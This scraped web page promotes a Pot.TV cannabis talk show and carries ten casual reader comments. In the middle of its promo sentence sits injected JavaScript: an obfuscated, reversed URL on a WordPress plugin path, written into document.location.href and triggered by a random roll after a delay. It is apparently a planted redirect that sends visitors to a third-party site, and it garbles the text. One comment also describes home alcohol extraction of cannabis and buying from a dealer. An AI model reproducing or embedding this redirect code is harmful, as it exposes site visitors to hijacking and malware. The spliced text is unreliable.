The 420 Lifestyle Show: What’s Going on in the World of Weed?

The 420 Lifestyle Show: What’s Going on in the World of Weed?

POT.TV – WATCH The 420 Lifestyle Show with hosts Carly Marley and BCbudgal as they discuss this week’s news and events!

We’re joined in studio by awesome guests like Fashionably High and Bliss. Tune in toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to see their amazing products, and join us getting high!

The 420 Lifestyle Show broadcasts LIVE every Monday at 4pm pt on Pot.TV!

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10 thoughts on “The 420 Lifestyle Show: What’s Going on in the World of Weed?”

  1. landon peekeekoot says:

    im in regina

  2. landon peekeekoot says:

    i was charged for an eight a few years back

  3. ron valic says:

    Start a mass exodus of canadians to colorado or washington or california for weekend ventures where you can buy all the oils and waxes you canadians deserve, and do these mass exoduses routinely every stinking day, thousands of canadians flood the border patrol on their way to america to get something that they should be able to get in canada, and so, when you all do that the parliament you have up there will let it fly

  4. ron valic says:

    alcoholics run the systems of everything from government to law and big pharma and they hate fun cause when you drink you fall asleep and they cannot have fun so they are jealous and busting people brings in lots of money

  5. Shan Santee says:

    I wanna take out BC gal out on a date. She’s cute.

  6. Danky The Clown says:

    B R A V O !!!
    Great post ladies. We enjoyed watching.

    Your neighbor,
    -Danky The Clown

  7. Robert Baldwin says:

    Bogus legalization a really shit Show , lip dumbing down the weed then selling dumb genentics will

  8. Amsterdam MedicalUnited says:

    I love the news, I love the show, that girl looks super cute in that winter hat taking bong hits. Much love. Double post…. use a alcohol called everclear!!! It's almost pure grain alcohol and you can use that to extract… once you freeze and filter it all you need to do it let it evaporate naturally open air… like pour it in a Pyrex glass baking sheet for making brownies… ALSO it's legal here in beat town but I have yet to go to one since I grow and make my own extract. Still I will always buy from my drug dealer becuase I get top strains with F'ing seeds in it!!!!! Like last bag I got had seeds in my SHERBET! Totally going to grow those, and seeds are impossible to find and illegal to order so it's insane a drug dealer sells pineapple express, pinkstarburst, candy land, northern lights, gelato, sherbet and more all having seeds in them lol and they are FIRE! I'll buy a ounce of fire weed anyday if I get 1, 3 or more beans on my weed

  9. Lyle Ketchum says:

    Hey BC Budgirl, where did you get your stash box and is it odor proof?

  10. kevin moman says:

    I love y'all show

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